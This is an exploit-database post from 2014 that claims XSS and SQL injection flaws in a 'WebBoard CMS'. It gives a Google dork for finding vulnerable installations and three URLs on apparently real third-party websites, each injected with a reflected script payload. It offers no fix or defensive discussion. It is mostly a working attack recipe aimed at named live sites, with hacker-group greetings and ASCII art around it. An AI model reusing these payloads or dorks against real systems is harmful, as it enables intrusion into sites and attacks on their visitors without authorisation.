WebBoard CMS Multiple Vulnerability

2014-05-26 10:25:52
Posted by: irist.ir


` `. ,;\' /
`. ,\'/ .\'
`. X /.\'
.-;--\'\'--.._` ` (
.\' / `
, IeDb.ir ` \' Q \'
, , `._ \\
,.| \' `-.;_\'
: . ` ; ` ` --,.._;
\' ` , ) .\'
`._ , \' /_
; ,\'\'-,;\' ``-
``-..__``--`

#################################

# Exploit Title : WebBoard CMS Multiple Vulnerability

# Author : IeDb Security Team

# Discovered By : Bl4ck M4n

# Home : http://www.iedb.ir/acc

# Security Risk : High

# Tested on : Linux / xp / vista /

# Dork : inurl: webboard_view.php?qid=

#################################
Exploit (Xss And Sql Injection) :

http://www.tweecholbotanicgarden.com/webboard_view.php?qid=44"><script>prompt(/Bl4ck M4n/)</script>
http://www.saira.go.th/webboard/view.php?No=71"><script>prompt(/Bl4ck M4n/)</script>
http://studydroid.com/printerFriendlyViewPack.php?packId=223483"><script>prompt(/Bl4ck M4n/)</script>


#################################

[email protected]


#################################

# Greats : Amir ! Bl4ck N3T ! joker_s ! ErfanMs ! Security ! ExTr4 ! MrHS3c ! z3r0 ! Mr.Time ! E1.Coders ! enddo

# & All Members In IrIsT.Ir / iedb.ir

#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################

Fixes

No fixes

In order to submit a new fix you need to be registered.